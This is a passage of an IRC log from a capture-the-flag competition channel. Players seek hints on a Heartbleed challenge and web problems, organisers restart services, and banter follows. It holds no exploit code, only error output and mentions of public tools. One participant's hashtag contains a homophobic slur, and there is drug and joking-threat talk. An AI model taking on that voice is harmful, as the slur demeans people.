  961. (01:57:18) (Anyny0) x)
  962. (01:57:26) (asmoday) EOF drop drop
  963. (01:57:39) (pipecork) is 0xffa supposed to be Final Fantasy 10?
  964. (01:59:00) (+clockish) nah man
  965. (01:59:06) (hellok_) for hb: Error opening ''
  966. (01:59:07) (hellok_) 140402478491304:error:02001002:system library:fopen:No such file or directory:bss_file.c:169:fopen('','r')
  967. (01:59:07) (hellok_) 140402478491304:error:2006D080:BIO routines:BIO_new_file:no such file:bss_file.c:172:
  968. (01:59:12) (+clockish) pipecork: 0xf0f + 0xeb
  969. (01:59:13) ••• jOin: (aloha_) (76468068@gateway/web/freenode/ip.118.70.128.104)
  970. (01:59:37) (+clockish) two different teams joined, those are their abbrvs
  971. (01:59:39) (RedRover) ffx was the shit
  972. (01:59:49) ••• jOin: (hogehoge_) ([email protected])
  973. (01:59:51) (RedRover) any tips/pointers for web 150
  974. (01:59:56) (RedRover) like a general anything
  975. (01:59:58) (tylerma7) good night
  976. (01:59:59) (pipecork) clockish: ah rad
  977. (02:00:04) ••• qUit: (tylerma7) ([email protected]) Quit: Quitte
  978. (02:00:06) (RedRover) night
  979. (02:00:34) ••• qUit: (hogehoge) ([email protected]) Ping timeout: 258 seconds
  980. (02:00:39) ••• qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  981. (02:00:39) (asmoday) NO heartbeat geez cant even get the easy ones
  982. (02:00:42) ••• qUit: (fasmotol) ([email protected]) Quit: Leaving.
  983. (02:01:06) ••• jOin: (pctf_monitor) ([email protected])
  984. (02:02:05) ••• qUit: ([SF]testdata) (75c1a076@gateway/web/freenode/ip.117.193.160.118) Ping timeout: 240 seconds
  985. (02:02:21) ••• jOin: (nullProtectorate) ([email protected])
  986. (02:03:28) ••• qUit: (pctf_monitor) ([email protected]) Client Quit
  987. (02:04:10) (RedRover) Im so close on g++
  988. (02:04:19) (RedRover) i got stuck though, it's too late
  989. (02:04:52) (dwn) heartbeat being denied by some team with a script
  990. (02:04:55) (dwn) probs
  991. (02:05:13) (aloha_) any hint for crypto20 ?
  992. (02:05:37) (dwn) yes
  993. (02:05:40) (dwn) it is worth 20 points
  994. (02:05:43) (shortkidd) thanks dn
  995. (02:05:44) (shortkidd) dwn
  996. (02:05:48) (inter) yes
  997. (02:05:52) (dwn) np
  998. (02:05:54) (inter) its a crypto challenge
  999. (02:05:59) (Yen1) man, I could do web300 if it didn't keep going down :/
  1000. (02:06:30) (+mserrano) Yen1: =\
  1001. (02:06:36) (+mserrano) sorry
  1002. (02:06:40) (+mserrano) people are like spamming it
  1003. (02:06:42) (inter) mserrano: are you ever going to sleep tonight :o
  1004. (02:06:47) (Yen1) to be fair, I have the wrong solution, which works, but it's slow
  1005. (02:06:48) (dwn) i could do something of some server's dns cache wasn't ignoring my record ttls
  1006. (02:06:58) (warrick) mserrano: down for me too, could you give it a nudge please :]
  1007. (02:07:05) (Yen1) so it's kinda my fault too. I'm probably one of those spammers :/
  1008. (02:07:08) ••• qUit: (nullProtectorate) ([email protected]) Ping timeout: 276 seconds
  1009. (02:07:12) (+clockish) is this heartbleed?
  1010. (02:07:17) (Yen1) well, depends on what rates you mean by spamming
  1011. (02:07:18) • +mserrano nudging it
  1012. (02:07:20) (+mserrano) clockish: whatscat
  1013. (02:07:25) (+clockish) oh ok good
  1014. (02:07:30) (+mserrano) and yes I will sleep
  1015. (02:07:33) (+clockish) you fix it :P
  1016. (02:07:35) (acez) something happened to nightmares ?
  1017. (02:08:00) (inter) clockish is in charge of nightmares
  1018. (02:08:05) (inter) you can slap him couple times for it
  1019. (02:08:13) (+clockish) checking nightmares
  1020. (02:08:15) (acez) 1 2
  1021. (02:08:31) ••• jOin: (pctf_watcher) ([email protected])
  1022. (02:08:36) (+clockish) nightmares is working
  1023. (02:08:38) ••• jOin: (tokki) (d9a5709e@gateway/web/freenode/ip.217.165.112.158)
  1024. (02:08:51) (+mserrano) ok
  1025. (02:08:57) (+mserrano) I think people were sqlmap'ing registration
  1026. (02:09:00) (+mserrano) because there were like
  1027. (02:09:03) (+mserrano) thousands of users
  1028. (02:09:15) (+mserrano) But whatscat has been nuged
  1029. (02:09:17) (+mserrano) nudged*
  1030. (02:09:22) (iago-x86) the heartbleed level's ports seem to all be closed..
  1031. (02:09:24) (+mserrano) by which I mean reset to its base state, hopefully
  1032. (02:09:29) ••• jOin: (kris) ([email protected])
  1033. (02:09:31) (inter) iago-x86 ikr? LOL
  1034. (02:09:32) (+mserrano) clockish: ^^
  1035. (02:09:33) (acez) clockish: hmm it's not responding to me
  1036. (02:09:44) (+mserrano) man computers are hard
  1037. (02:09:53) (acez) times out
  1038. (02:10:14) (iago-x86) hmm, browser negotiates SSL, then fails
  1039. (02:10:17) (iago-x86) Maybe I'm crazy :)
  1040. (02:10:26) (+clockish) heartbleed comes back on it's own every 30 sec
  1041. (02:11:15) (inter) you actually automated that?
  1042. (02:11:22) (inter) and you didnt make pyjail easier? :(
  1043. (02:11:44) (asmoday) haha opposite of what the rest of us have been doing since it became popular this week
  1044. (02:11:49) (+clockish) inter: it's 3 lines of bash to fix the mistake that openssl s_client is not a forking or threaded server :P
  1045. (02:12:26) (abcert) hint for web 150???
  1046. (02:12:33) ••• jOin: (nectoo) ([email protected])
  1047. (02:12:39) (iago-x86) abcert: It's vulnerable. :)
  1048. (02:12:52) (namrog84) am i supposed to brute force the secret, or is there another way to solve that? for 150
  1049. (02:12:55) (namrog84) to discover it
  1050. (02:12:59) (iago-x86) And conveniently, I wrote the best tool for abusing said vulnerability. :)
  1051. (02:13:09) (abcert) iago-x86, :D, it is not a hint
  1052. (02:13:28) (+clockish) namrog84: brute force will not work
  1053. (02:13:37) (+clockish) unless you have all the computers and all of the time
  1054. (02:13:42) ••• pArt: (pctf_watcher) ([email protected]) "WeeChat 0.3.8"
  1055. (02:13:44) (namrog84) i mean im at the admin page, examining various things
  1056. (02:13:46) (iago-x86) Also bandwidth
  1057. (02:13:47) ••• jOin: (pctf_watcher) ([email protected])
  1058. (02:14:09) (namrog84) i didnt mean brute forcing the website, i can do it local to solve the salt, is what i meant
  1059. (02:14:29) (+clockish) and I mean that it's not actually possible to solve for that salt.
  1060. (02:14:45) (namrog84) i was trying to do that, and also try another attack vector
  1061. (02:14:49) (namrog84) but ill drop the brute then
  1062. (02:15:03) (namrog84) try and figure out what im doing wrong
  1063. (02:15:10) (mrsmith67) can anyone help me on heartbleed?
  1064. (02:15:19) (mrsmith67) none of the poc's work :(
  1065. (02:15:22) (mrsmith67) im new to ctfs
  1066. (02:15:27) (mrsmith67) but cant even land a 10ptr :(
  1067. (02:15:40) (ryan-c) arg, stupid rsa
  1068. (02:15:54) (namrog84) clockish, am i supposed to figure out the salt, or just bypass that aspect completely ?
  1069. (02:15:58) (iago-x86) mrsmith67: Do your best, then read writeups afterwards. :)
  1070. (02:15:58) (asmoday) I am not new to CTFS and I am stuck on too many
  1071. (02:16:02) (asmoday) my team sucks ha
  1072. (02:16:22) (asmoday) this heartbleed is not very bloody
  1073. (02:16:29) (+clockish) asmoday: correct
  1074. (02:16:32) (+clockish) we bleed flags
  1075. (02:16:34) (+clockish) not blood
  1076. (02:16:56) (asmoday) TTLS?
  1077. (02:16:58) (+clockish) namrog84: well, if you thing you can't get something, then you should assume the flag is somewhere else :)
  1078. (02:18:38) (+frozencemetery) your princess is in another castle etc.
  1079. (02:19:21) (mrsmith67) im just looking for right direction, thats all
  1080. (02:19:28) (mrsmith67) none of the scripts i have for heartbleed are working :(
  1081. (02:19:54) (asmoday) me either
  1082. (02:20:11) (asmoday) even resorted to metasploit which I know 10000% works as I have used it on my customers
  1083. (02:20:32) (iago-x86) That's a lot of working
  1084. (02:20:51) (x7r0n) any ops
  1085. (02:20:52) (x7r0n) ?
  1086. (02:21:14) (iago-x86) No ops, according to /names
  1087. (02:21:23) (iago-x86) Unless you mean opcodes, I have plenty of those
  1088. (02:21:44) (abuss) can we get more workers on reekee? :)
  1089. (02:21:51) (abuss) so slow :(
  1090. (02:21:52) (foundation) damnit PPP, i tought to myself "this heartbleed thingie is becoming really anoying to watch so i'll play CTF for a while while everybody shuts up about it" , but noooooooo
  1091. (02:22:12) (+cai_) lol
  1092. (02:22:12) ••• qUit: (XPenguin) ([email protected]) Quit: Leaving.
  1093. (02:22:27) ••• qUit: (Guest95043) (3d7ebfc3@gateway/web/freenode/ip.61.126.191.195) Quit: Page closed
  1094. (02:22:28) (asmoday) this ctf heartbleed is better patched
  1095. (02:22:35) (+cai_) gotta make sure everyone knows how that shit works man
  1096. (02:22:37) ••• qUit: (CaIlou) ([email protected]) Ping timeout: 252 seconds
  1097. (02:22:45) (asmoday) not very well in this instance
  1098. (02:23:00) ••• jOin: ([CISSP]m1thieu) ([email protected])
  1099. (02:23:18) (iago-x86) I said "If I was running a CTF, I'd be scrambling to include heartbleed"
  1100. (02:23:25) (iago-x86) Called it! :)
  1101. (02:23:28) (+cai_) :p
  1102. (02:23:51) (foundation) **[Dsigh
  1103. (02:23:54) ••• jOin: (mathiasbynens) (sid2247@gateway/web/irccloud.com/x-bahgxrmimlqnassq)
  1104. (02:23:58) (abuss) scrambled, indeed
  1105. (02:24:03) (iago-x86) [2014-04-11 12:17:37] < iago-x86> If I was running the CTF, I'd be quickly adding a heartbleed level :)
  1106. (02:24:15) (iago-x86) 12 hours ago
  1107. (02:24:44) ••• qUit: ([CISSP]mathieu) ([email protected]) Ping timeout: 252 seconds
  1108. (02:24:49) (asmoday) No heartbeat response received, server likely not vulnerable
  1109. (02:24:56) (iago-x86) Or, more likely, PPP knew about heartbleed before and had always intended to include it as a 500pt level
  1110. (02:25:01) (asmoday) socket.error: [Errno 111] Connection refused
  1111. (02:25:02) (iago-x86) Then some asshole leaked it and it became 20pts
  1112. (02:25:08) (foundation) well, we all know you are working for google , so ...
  1113. (02:25:16) (iago-x86) shh ;)
  1114. (02:25:18) ••• jOin: (potato__) ([email protected])
  1115. (02:25:25) • iago-x86 didn't know anything till it was public
  1116. (02:25:36) (iago-x86) Which is for the best, I can't keep a secret :)
  1117. (02:25:45) (foundation) :)
  1118. (02:25:50) (asmoday) its been known since november
  1119. (02:26:21) (iago-x86) Whoever chose the background for MyMeme.. I hate you. :)
  1120. (02:26:23) ••• qUit: (kris) ([email protected]) Ping timeout: 240 seconds
  1121. (02:26:32) (+mserrano) we had to include heartbleed
  1122. (02:26:32) (+cai_) asmoday: maybe you should try to construct an attack instead of using public poc (or find better poc)
  1123. (02:26:37) (+mserrano) it was released this week
  1124. (02:26:38) (+mserrano) I mean
  1125. (02:26:39) (+mserrano) come on
  1126. (02:26:56) (x7r0n) geohot would get more views :-D
  1127. (02:27:11) (iago-x86) I loved the reference to geohot's rapping
  1128. (02:27:27) (foundation) what's mymeme?
  1129. (02:27:35) (iago-x86) It's a Web level
  1130. (02:28:10) ••• jOin: (bob__) (1817f0b6@gateway/web/freenode/ip.24.23.240.182)
  1131. (02:28:34) ••• nIck: (bob__) is now known as (bobsteam)
  1132. (02:28:53) (marcoscars02) tor domain off?
  1133. (02:29:51) ••• jOin: (whiteout) ([email protected])
  1134. (02:30:25) (iago-x86) Just so you all know, I still have nightmares about cnot
  1135. (02:30:53) (+frozencemetery) <3 wren
  1136. (02:30:57) (arthurdent) i can't seem to connect to any of these heartbleed ports
  1137. (02:31:09) (iago-x86) arthurdent: Just wait a minute and try again
  1138. (02:31:13) (iago-x86) Apparently the service is sketch :)
  1139. (02:31:21) (inter) frozencemetery what problem are you in charge of :o
  1140. (02:31:28) (+frozencemetery) it's heartbleed; it's not allow to be legit
  1141. (02:31:42) (+frozencemetery) inter: ah, but that would be telling!
  1142. (02:31:49) (+frozencemetery) where's the fun in that?
  1143. (02:32:03) ••• jOin: (wahwah) ([email protected])
  1144. (02:32:28) (inter) because i would like to accuse you
  1145. (02:32:34) (inter) of all the problems that is killing my brain cells
  1146. (02:32:43) (inter) if you dont tell me them :/
  1147. (02:32:44) (inter) jk
  1148. (02:33:33) ••• qUit: (LouTerrailloune) ([email protected]) Ping timeout: 245 seconds
  1149. (02:33:55) ••• jOin: (potato___) ([email protected])
  1150. (02:34:05) (+mserrano) inter: which problems are killing your brain cells
  1151. (02:34:21) ••• pArt: (potato___) ([email protected])
  1152. (02:34:22) ••• jOin: (kris) ([email protected])
  1153. (02:34:48) (inter) rsa homie
  1154. (02:34:50) (zardus) mserrano: web200 is giving a 403 :-(
  1155. (02:35:15) (+mserrano) inter: tylerni7 wrote it; I "tested" it
  1156. (02:35:40) (inter) how did your "test" go?
  1157. (02:36:06) (tomcr00se) omg missed reekeee by 4 minutes :/
  1158. (02:36:16) (tomcr00se) dumbest typo
  1159. (02:36:19) (+mserrano) inter: I got the flag.
  1160. (02:36:20) (+clockish) tomcr00se: hack faster
  1161. (02:36:23) ••• qUit: (potato__) ([email protected]) Ping timeout: 240 seconds
  1162. (02:36:31) (abuss) can I PM someone about reeeekeee?
  1163. (02:36:37) (x7r0n) how do i vote..i select the number and then ?
  1164. (02:36:38) (+mserrano) zardus: which web 200
  1165. (02:36:48) (shortkidd) Just keep it selected x7r0n
  1166. (02:37:22) ••• jOin: (insanitybit) (969cdb9b@gateway/web/freenode/ip.150.156.219.155)
  1167. (02:37:23) (x7r0n) like i want it for forensics100 shortkid
  1168. (02:37:37) (x7r0n) so i selected the number and then ?
  1169. (02:37:38) (insanitybit) YOOOOOOOOOOOOOOOOOOOOO
  1170. (02:37:41) ••• qUit: (nectoo) ([email protected]) Ping timeout: 276 seconds
  1171. (02:37:51) (+mserrano) also, just saw samurai solved tiffany
  1172. (02:38:00) (+mserrano) ebeip90: bool101: hope you liked it :P
  1173. (02:38:03) (bobsteam) anyone finished with mtpox up for a question/pm?
  1174. (02:38:13) (insanitybit) Vote 3 for pwnables
  1175. (02:38:16) (inter) tomcr00se: the one man army is real
  1176. (02:38:26) (x7r0n) discharge in 11 minutes..please vote for forensics100
  1177. (02:38:32) (synthverity) I second the pwnables notion
  1178. (02:38:36) (inter) are you from Valkyrie
  1179. (02:38:37) (inter) ?
  1180. (02:38:39) (insanitybit) fuck foensics what
  1181. (02:38:54) (x7r0n) u dont fuck..just vote :-D
  1182. (02:39:01) (insanitybit) :O
  1183. (02:39:18) (insanitybit) pwnables ftw
  1184. (02:39:29) (tomcr00se) moar pwnables yes yes yes
  1185. (02:39:32) (synthverity) There is no forensics 100
  1186. (02:39:33) (insanitybit) ^^^^^^
  1187. (02:39:42) (synthverity) There is a 350
  1188. (02:40:02) ••• jOin: (potato__) ([email protected])
  1189. (02:40:13) (x7r0n) the one before reversing 200
  1190. (02:40:21) (+mserrano) zardus: looks ok to me
  1191. (02:40:22) ••• jOin: (zzoru) (8ff8f941@gateway/web/freenode/ip.143.248.249.65)
  1192. (02:40:23) (+clockish) I will laugh my ass off if for350 gets picked
  1193. (02:40:28) (insanitybit) are you on the wrong page
  1194. (02:40:36) (+mserrano) lol
  1195. (02:40:39) (insanitybit) ill give you 350 to smd damn wrecked slammed
  1196. (02:40:39) (insanitybit) irl
  1197. (02:40:40) (insanitybit) x_x
  1198. (02:40:40) • +mserrano == clockish
  1199. (02:40:45) (+clockish) EVERYBODY PICK FOR350
  1200. (02:40:46) (+mserrano) it will be hilarious if that is the next problem opened
  1201. (02:41:00) (x7r0n) opp to powerups
  1202. (02:41:05) (+mserrano) I really
  1203. (02:41:07) (+mserrano) don't know
  1204. (02:41:10) (insanitybit) noooo
  1205. (02:41:13) (+mserrano) why you guys skipped over all the 200/100 pointers
  1206. (02:41:13) (insanitybit) im sitting here
  1207. (02:41:15) (insanitybit) waiting for pwns
  1208. (02:41:21) (insanitybit) ur kilin me
  1209. (02:41:22) (insanitybit) :x
  1210. (02:42:04) (x7r0n) y nt all 100
  1211. (02:42:10) (insanitybit) 100s every run
  1212. (02:42:12) (insanitybit) this is the run
  1213. (02:43:07) ••• qUit: (copyleft_) ([email protected]) Ping timeout: 258 seconds
  1214. (02:43:09) (insanitybit) how many votes does a person get even ???????? !!!!!!!
  1215. (02:43:29) ••• jOin: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17)
  1216. (02:43:34) (+mserrano) one per team I believe
  1217. (02:43:42) (+mserrano) per voting period, obviously
  1218. (02:44:02) (+clockish) insanitybit: NO, THE FASTER AND HARDER YOU CLICK THE MORE AND BETTER YOUR VOTES
  1219. (02:44:14) (+clockish) EVERYONE CLICK FOR350 REALLY HARD PLZ
  1220. (02:44:21) (insanitybit) I BROKE MY MOUSE CUZ IM CLICKING TOO DAMN HARD
  1221. (02:44:28) (insanitybit) EVERYONE CLICK FOR PWNABLES DONT LISTEN TO CLOCKISH
  1222. (02:44:29) ••• qUit: (vesh) ([email protected]) Read error: Connection reset by peer
  1223. (02:44:31) (+clockish) insanitybit: BREAK YOUR TABLE TOO
  1224. (02:44:34) (insanitybit) HE HAS A + IN HIS NAME IM FOR THE PEOPLE
  1225. (02:44:44) (insanitybit) WHO ARE THESE '+' USERS
  1226. (02:44:44) (insanitybit) EVEN
  1227. (02:44:48) (insanitybit) PWNABLES FOR THE PEOPLE
  1228. (02:44:53) (synthverity) Viva la revolution
  1229. (02:45:04) (+clockish) I DON'T KNOW I JUST FOUND THIS CHANNEL AND HAVE BEEN TROLLING IT FOR HOURS
  1230. (02:45:06) (shortkidd) It's <+(they're name), duh
  1231. (02:45:07) (+frozencemetery) insanitybit: funny, it looks more like you broke your caps lock
  1232. (02:45:09) (+clockish) ALSO HOW DO I TURN OFF CAPS LOCK
  1233. (02:45:13) (insanitybit) i love when my dree
  1234. (02:45:14) (tokki) lol
  1235. (02:45:17) (insanitybit) aoeurghaerg
  1236. (02:45:19) (insanitybit) WHATS HAPPENED
  1237. (02:45:21) (+frozencemetery) clockish: just hold down shift while you type!
  1238. (02:45:21) (insanitybit) OH GOD
  1239. (02:45:34) (insanitybit) THAT RAVE CHALLENEGE
  1240. (02:45:35) (insanitybit) AND THEN THE BEER
  1241. (02:45:36) (insanitybit) AND
  1242. (02:45:39) (insanitybit) THE +
  1243. (02:45:41) (insanitybit) PWNABLES GO
  1244. (02:45:53) (synthverity) Go go pwnable rangers!
  1245. (02:46:15) (+clockish) frozencemetery:
  1246. (02:46:16) (+clockish) _ _ _ _ ____
  1247. (02:46:16) (+clockish) | | | | / \ | | | _ \
  1248. (02:46:16) (+clockish) | |_| | / _ \ | | | |_) |
  1249. (02:46:16) (+clockish) | _ |/ ___ \| |___| __/
  1250. (02:46:16) (+clockish) |_| |_/_/ \_\_____|_|
  1251. (02:46:23) (synthverity) Mighty Sucking Pwna rangers!
  1252. (02:46:23) (+frozencemetery) D:
  1253. (02:46:23) (insanitybit) hax
  1254. (02:46:24) (insanitybit) hax
  1255. (02:46:25) (insanitybit) ban
  1256. (02:46:25) (insanitybit) ban
  1257. (02:46:28) (+mserrano) pls
  1258. (02:46:33) (insanitybit) no too late
  1259. (02:46:37) (insanitybit) ban
  1260. (02:46:40) (insanitybit) ban all of you
  1261. (02:46:44) (tokki) lol
  1262. (02:46:45) (jagger_) is this page at http://6c4dm56aer6xn2h2.onion/ up? from misc 200?
  1263. (02:46:47) ••• qUit: (HeadHunter) ([email protected]) Ping timeout: 240 seconds
  1264. (02:46:53) (synthverity) It's Happening!!!
  1265. (02:46:57) (insanitybit) .onion isn't a real thing try .com
  1266. (02:46:58) (insanitybit) duh
  1267. (02:46:59) ••• jOin: (vesh) ([email protected])
  1268. (02:47:03) (insanitybit) step #1
  1269. (02:47:10) (shortkidd) try .garlic as well
  1270. (02:47:14) (insanitybit) .salt
  1271. (02:47:15) (+clockish) jagger_: that problem is working as intended ;)
  1272. (02:47:16) (insanitybit) i hear salts are important
  1273. (02:47:18) ••• qUit: (Gynvael) ([email protected]) Ping timeout: 245 seconds
  1274. (02:47:18) (insanitybit) to securities
  1275. (02:47:24) (shortkidd) .wannab
  1276. (02:47:30) (insanitybit) the callout
  1277. (02:47:40) • shortkidd SNAP
  1278. (02:47:52) (insanitybit) ^
  1279. (02:47:55) (jagger_) clockish, thx
  1280. (02:47:55) (insanitybit) wrecked
  1281. (02:48:05) (shortkidd) #rekt
  1282. (02:48:17) (insanitybit) rest in poop
  1283. (02:48:19) (insanitybit) #poop
  1284. (02:48:26) (shortkidd) rip in pieces
  1285. (02:48:33) (synthverity) #Octothorpe
  1286. (02:48:42) (shortkidd) ohgod he spelled it right too
  1287. (02:48:49) (shortkidd) most people say thrope
  1288. (02:48:57) (insanitybit) it's pronounced thrope
  1289. (02:48:58) (insanitybit) it's thrope
  1290. (02:49:06) (insanitybit) i dare you to spell it thrope
  1291. (02:49:07) (insanitybit) i fkn dare you
  1292. (02:49:11) (insanitybit) ill kill you
  1293. (02:49:11) (synthverity) And that's with two shots of spirytus
  1294. (02:49:13) (tokki) thor!
  1295. (02:49:17) (+mserrano) ok you guys opened web
  1296. (02:49:18) (+mserrano) good
  1297. (02:49:26) (insanitybit) thorrrrr
  1298. (02:49:30) (insanitybit) FML
  1299. (02:49:31) (insanitybit) REALLY
  1300. (02:49:32) (insanitybit) WEB
  1301. (02:49:33) (insanitybit) REALLY
  1302. (02:49:41) (tokki) aw... was waiting for pwnables..
  1303. (02:49:46) (insanitybit) same
  1304. (02:49:54) (+frozencemetery) should open zfs soonish tho
  1305. (02:50:02) (+mserrano) lol
  1306. (02:50:15) (insanitybit) ill give an admin all the bitcoins i hacked from mtgox if they open up the pwnables
  1307. (02:50:18) (+mserrano) we're actually... kinda low on pwnables this year
  1308. (02:50:20) (insanitybit) its legit
  1309. (02:50:20) (shortkidd) insanitybit: http://lmgtfy.com/?q=octothrope
  1310. (02:50:20) (tokki) lol
  1311. (02:50:21) (+mserrano) in case you hadn't noticed
  1312. (02:50:27) (+mserrano) our hard pwnable is in production
  1313. (02:50:49) (insanitybit) yeah but im an idiot so givve me like the 100 lvl one
  1314. (02:51:05) (insanitybit) http://conricpr.wordpress.com/2013/06/20/alter-your-facebook-experience-use-an-octothrope/
  1315. (02:51:13) (asmoday) ok I have a lot of certificates for heartbleed what do I do with it
  1316. (02:51:22) (insanitybit) give them to me
  1317. (02:51:34) ••• qUit: (hellok_) ([email protected]) Quit: hellok_
  1318. (02:51:40) ••• qUit: (ubuntor) ([email protected]) Remote host closed the connection
  1319. (02:51:46) (bobsteam) wewt, there we go mtpox
  1320. (02:52:27) (insanitybit) ho wlong till the next vote
  1321. (02:52:33) (insanitybit) how do i change my name to [CISSP]insanitybit
  1322. (02:52:33) (insanitybit) btw
  1323. (02:52:44) (+mserrano) type /nick [CISSP]insanitybit
  1324. (02:52:57) ••• nIck: (insanitybit) is now known as ([CISSP]insanityb)
  1325. (02:52:59) ([CISSP]insanityb) sweet
  1326. (02:53:02) ([CISSP]insanityb) oh god
  1327. (02:53:05) ••• qUit: (nope_) (a2f31ed0@gateway/web/freenode/ip.162.243.30.208) Ping timeout: 240 seconds
  1328. (02:53:06) ([CISSP]insanityb) there's a limit
  1329. (02:53:07) ••• jOin: (Gynvael) ([email protected])
  1330. (02:53:08) (bobsteam) insanityb
  1331. (02:53:10) ([CISSP]insanityb) NO
  1332. (02:53:11) ([CISSP]insanityb) FML
  1333. (02:53:16) ([CISSP]insanityb) IM NOT INSANITYBIT
  1334. (02:53:20) (reanimus) Cheombuteo ttokgatji nal bakkuryeo haji ma
  1335. (02:53:26) ••• nIck: ([CISSP]insanityb) is now known as ([CISSP]ibit)
  1336. (02:54:20) ([CISSP]ibit) https://www.youtube.com/watch?v=tc42TNLw7zU
  1337. (02:54:21) (tokki) lol
  1338. (02:54:54) ([CISSP]ibit) https://www.youtube.com/watch?v=0Z9R57maGvc
  1339. (02:54:57) ([CISSP]ibit) ^ important for that challenge
  1340. (02:54:59) ([CISSP]ibit) trust me
  1341. (02:55:25) (+clockish) ^ Trust him
  1342. (02:55:32) (+clockish) [CISSP]ibit knows his shit
  1343. (02:55:36) (+mserrano) all the kpop is important
  1344. (02:56:07) ([CISSP]ibit) ^
  1345. (02:56:31) (asmoday) I keep getting the same certs from heartbleed what part of this is the flag
  1346. (02:56:35) ([CISSP]ibit) https://www.youtube.com/watch?v=yzC4hFK5P3g
  1347. (02:56:37) (tokki) am I supposed to listen to this the whole ctf
  1348. (02:56:48) (tokki) and then like at the last minute it spits out the flag
  1349. (02:56:58) ([CISSP]ibit) how do i do the shrug emoji
  1350. (02:57:04) (inter) who
  1351. (02:57:05) (inter) the fuck
  1352. (02:57:08) (inter) puts ponponpon
  1353. (02:57:08) (tokki) *shrug*
  1354. (02:57:11) ••• qUit: (RedRover) (43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  1355. (02:57:13) (bobsteam) https://www.youtube.com/watch?v=yzC4hFK5P3g
  1356. (02:57:13) ([CISSP]ibit) ¯\_(ツ)_/¯,
  1357. (02:57:21) (tokki) wait wtf
  1358. (02:57:32) (inter) the Çѱ¹¾î is real
  1359. (02:57:32) ••• qUit: (bativoland) ([email protected]) Remote host closed the connection
  1360. (02:57:40) ••• jOin: (toxickappa) ([email protected])
  1361. (02:57:40) (+mserrano) okay
  1362. (02:57:45) (+mserrano) I am going to sleep for a couple hours
  1363. (02:57:53) (bobsteam) dontdoit
  1364. (02:57:54) (bobsteam) youll lose
  1365. (02:57:55) (+mserrano) if shit breaks while I am asleep I am sorry
  1366. (02:57:59) (tokki) no
  1367. (02:58:02) (tokki) i dare you to sleep
  1368. (02:58:07) (+mserrano) just send me a message and I'll fix it when I get up
  1369. (02:58:07) (+mserrano) <3
  1370. (02:58:21) ([CISSP]ibit) ⊂(´・◡・⊂ )∘˚˳°
  1371. (02:58:29) (inter) mserrano i can rent you sleep from the sleep bank
  1372. (02:58:37) (inter) the interest is your life huehue
  1373. (02:58:45) (synthverity) Sleep? I can sleep when I'm dead
  1374. (02:58:51) (tokki) dat laugh
  1375. (02:58:56) ([CISSP]ibit) ill be sleeping saturday night
  1376. (02:59:36) (inter) [CISSP]ibit, are you guys cissp groupies
  1377. (02:59:45) ([CISSP]ibit) i love cissps and cissp culture
  1378. (03:00:24) (+clockish) frozencemetery and I are up for a while
  1379. (03:00:27) ([CISSP]ibit) this pyjail one is annoying last years was easier
  1380. (03:00:27) (bobsteam) just finish the game by tomorrow and sleep tomorrow night? good plan :D
  1381. (03:00:35) ([CISSP]ibit) yup
  1382. (03:00:37) (+clockish) but no guarentees on being able to fix kpop if it breaks :P
  1383. (03:00:39) ([CISSP]ibit) oh hey it's bobsteam
  1384. (03:00:47) ([CISSP]ibit) no kpop = no ctf
  1385. (03:00:50) ([CISSP]ibit) sorry but them's the breaks
  1386. (03:00:56) (inter) etes-vous les gars de Montreal?
  1387. (03:00:56) (+clockish) [CISSP]ibit: pro tip, this one is easier :P
  1388. (03:00:59) ••• jOin: (auscompgeek) (aucg@firefox/community/auscompgeek)
  1389. (03:01:04) (inter) clockish, you are kidding me
  1390. (03:01:06) ([CISSP]ibit) really? last year we were further
  1391. (03:01:09) ([CISSP]ibit) mean
  1392. (03:01:12) ([CISSP]ibit) the first half was obvi
  1393. (03:01:20) ([CISSP]ibit) the threadlock is fucking w/ me
  1394. (03:01:29) ••• nIck: (criple_ripper|aw) is now known as (criple_ripper)
  1395. (03:01:38) (inter) everything seems to be fucking with us
  1396. (03:01:46) (inter) the existance of life and death
  1397. (03:01:54) (tokki) listen to this
  1398. (03:01:55) (tokki) https://www.youtube.com/watch?v=oNS0Ffb5L60
  1399. (03:01:55) ([CISSP]ibit) i just grabbed my vodka and beer and im waiting for pwnables while my team mate works on pyjail
  1400. (03:01:59) (synthverity) Dude, are you high?
  1401. (03:02:09) ([CISSP]ibit) hell yeah
  1402. (03:02:09) (tokki) everyone's supposed to be high
  1403. (03:02:10) ([CISSP]ibit) hell yeha
  1404. (03:02:11) ••• qUit: (whiteout) ([email protected]) Quit: Lost terminal
  1405. (03:02:11) ([CISSP]ibit) hell YEAH
  1406. (03:02:12) (bobsteam) dudea re you not?
  1407. (03:02:15) (inter) who desont blaze here
  1408. (03:02:18) (tokki) yeha
  1409. (03:02:19) ([CISSP]ibit) ^^
  1410. (03:02:21) ([CISSP]ibit) blazeit
  1411. (03:02:21) (+frozencemetery) I am only awake now because I was asleep when this started :|
  1412. (03:02:24) (inter) [CISSP]ibit canadian pride
  1413. (03:02:26) (inter) #ubc
  1414. (03:02:36) (inter) #dealers
  1415. (03:02:37) (architekt) yay blazerz
  1416. (03:02:37) ([CISSP]ibit) can we just drop this fucking "plaidctf" shit and make this irc #kpop
  1417. (03:02:41) (inter) #420in8days
  1418. (03:02:43) (tokki) lol
  1419. (03:02:43) (+clockish) #yolo420blazeitfaggit
  1420. (03:02:48) (inter) dude
  1421. (03:02:48) (inter) im
  1422. (03:02:50) (inter) gonna be
  1423. (03:02:52) (inter) so stoked up
  1424. (03:02:53) (inter) for 420
  1425. (03:02:57) (inter) i pocketted 1k dolla
  1426. (03:02:59) (+frozencemetery) I mean, we can't stop you from listening to kpop while playing plaidctf
  1427. (03:03:03) ([CISSP]ibit) i cant even cuz of an internship
  1428. (03:03:03) ([CISSP]ibit) its such bs
  1429. (03:03:12) ([CISSP]ibit) frozencemetery you could ever stop me
  1430. (03:03:15) ([CISSP]ibit) from listening to kpop
  1431. (03:03:18) ([CISSP]ibit) i love you bb
  1432. (03:03:20) (+frozencemetery) welp
  1433. (03:03:21) (inter) dude
  1434. (03:03:23) (inter) its all about
  1435. (03:03:25) (inter) hyuna
  1436. (03:03:27) (inter) nobody else
  1437. (03:03:28) (tokki) lol
  1438. (03:03:31) ([CISSP]ibit) lmao
  1439. (03:03:32) (inter) #hyuna
